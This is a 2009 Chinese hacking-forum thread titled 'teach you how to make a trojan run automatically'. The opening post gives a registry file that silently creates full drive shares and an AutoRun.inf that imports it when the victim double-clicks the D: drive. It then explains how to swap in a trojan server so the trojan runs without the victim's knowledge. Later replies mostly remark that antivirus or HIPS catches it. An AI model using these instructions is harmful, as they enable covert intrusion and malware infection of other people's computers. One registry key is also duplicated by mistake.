绿色兵团 » 代码试验场 » 教你如何让木马自动运行

tanglin1258 发表于 2009-2-15 15:12

教你如何让木马自动运行

　[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\Lanman\\C$]  
　　"Path"="C:"  
　　"Remark"=""  
　　"Type"=dword:00000000  
　　"Flags"=dword:00000302  
　　"Parmlenc"=hex:  
　　"Parm2enc"=hex:  

　　[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\Lanman\\D$]  
　　"Path"="D:"  
　　"Remark"=""  
　　"Type"=dword:00000000  
　　"Flags"=dword:00000302  
　　"Parmlenc"=hex:  
　　"Parm2enc"=hex:  

　　[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\Lanman\\C$]  
　　"Path"="E:"  
　　"Remark"=""  
　　"Type"=dword:00000000  
　　"Flags"=dword:00000302  
　　"Parmlenc"=hex:  
　　"Parm2enc"=hex:  
　以上代码保存为Share.reg文件



　[AutoRun]  
　　Open=regedit/s Share.reg
保存AutoRun.inf文件。将Share.reg和AutoRun.inf这两个文件都复制到对方的D盘的根目录下，这样对方只要双击D盘就会将Share.reg导入注册表，这样对方电脑重启后所有驱动器就会都完全共享出来。

如果想让对方中木马，只要在AutoRun.inf文件中，把“Open=Share.Reg”改成“Open=木马服务端文件名”，然后把AutoRun.inf和配置好的木马服务端一起复制到对方D盘的根目录下，这样不需对方运行木马服务端程序，而只需他双击D盘就会使木马运行

30hedong 发表于 2009-2-20 15:49

这种方法容易被杀噢

Huige 发表于 2009-2-22 21:01

貌似要修改注册表啊！楼主这个有可行性吗？

leebuwei 发表于 2009-3-2 21:22

加油哦!有点慢了哦!:victory:

hackersean 发表于 2009-3-2 21:25

可恶的u盘病毒就是这样的。不过hips能轻松阻止

agoni05 发表于 2009-3-2 23:15

学习了  ...    thx

狐狸来了 发表于 2009-3-7 12:20

貌似有点不太行得通..
容易被干掉

00我不知道 发表于 2009-3-19 10:55

我以为有什么新办法呢:L :L

fljm 发表于 2009-3-19 15:30

大家好像都举得不是很好过杀毒软件的说

op99 发表于 2009-5-11 22:04

可以去试试

next 发表于 2009-6-7 18:28

看看，飘过....

白起 发表于 2009-7-11 11:19

导入注册表会被发现的！！

admi 发表于 2009-7-31 04:33

好长的代码啊

vincezhao 发表于 2009-8-19 16:59

问个问题……
如果在gpedit.msc里吧自动运行封了会怎样……

changl 发表于 2009-8-28 11:49

呵呵..类似于U盘病毒....?- -

rospin 发表于 2009-9-13 16:44

貌似U盘的防毒方法

chenwenwei 发表于 2009-12-19 13:31

算了  不看了  好麻烦呀

cikelg 发表于 2009-12-22 12:58

查毒的时候注意一下了！！！

aerdf67 发表于 2009-12-25 11:46

[b]有点不行[/b]

叶寒秋 发表于 2010-3-24 00:44

容易杀 啊

查看完整版本: 教你如何让木马自动运行